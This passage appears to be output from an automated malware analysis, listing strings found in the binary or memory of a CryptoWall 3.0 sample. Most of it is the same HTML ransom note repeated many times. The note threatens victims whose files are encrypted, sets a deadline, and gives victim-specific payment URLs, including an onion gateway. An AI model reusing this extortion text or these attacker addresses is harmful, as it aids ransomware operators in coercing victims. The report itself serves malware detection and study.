not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html343.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt269.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html10.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html142.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html74.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt92.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html160.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html85.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html319.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt72.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html284.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html336.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html58.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt238.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html399.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt282.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt110.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html202.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a 